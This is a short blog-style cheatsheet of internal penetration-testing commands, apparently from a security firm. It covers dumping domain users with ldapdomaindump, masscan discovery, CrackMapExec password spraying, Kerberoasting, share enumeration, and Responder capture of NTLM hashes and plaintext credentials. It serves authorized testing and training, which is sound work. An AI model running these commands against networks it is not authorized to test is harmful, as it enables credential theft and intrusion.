Skip to content
Home » Internal Pentesting Tools & Cheatsheet

Internal Pentesting Tools & Cheatsheet

I’ve had a lot of people emailing us asking for some of our common command usage for internal penetration testing engagements. This is a list from some of our internal notes that are great for beginners or administrators looking to gain some information from their own internal network.


Dumping all domain users

ldapdomaindump -u domain\\\\username -p Password <domaincontrollerIP>

Masscan Usage

Discovery on a private IP range. Note: a high rate will crash the network

masscan --ping <ipaddress> --rate=200 -oG filename.txt

//extracting (mostly) just the IP addresses

cat filename.txt | awk '{print $4}' > filename-delimited.txt

Discovering Windows host (hosts with SMB open)

masscan -p445 <ipaddress> --rate-200 -oG filename.txt

CrackMapExec Usage

Discovering Windows host (hosts with SMB open)

crackmapexec smb <ipaddress> 

Resolving list of ip addresses to hostnames

crackmapexec smb filename.txt

Spraying a user account username and pw

crackmapexec smb <ipaddress> -u jsmith -p Password1 -d domain.local

Dumping kerberos tickets

crackmapexec smb <domaincontrollerip> -u jsmith -p Password1 -d domain.local --kerberoasting output.txt

Dumping users

crackmapexec smb <domaincontrollerip> -u jsmith -p Password1 --users

Dumping shares and grepping for the right permissions


crackmapexec smb filename.txt -u jsmith -p Password1 -d domain.local --shares > shares.txt

cat shares.txt | grep --text READ // show all readables shares
cat shares.txt | grep --text WRITE // show all writeable shares

For more usage, visit

Responder/NTLMRelayx Usage

Basic NetNTLM Capture

responder -I eth0 -wF

Plaintext Capture USE WITH CAUTION

responder -I eth0 -Pb

Want to Learn More?

Contact us for our complete command guide!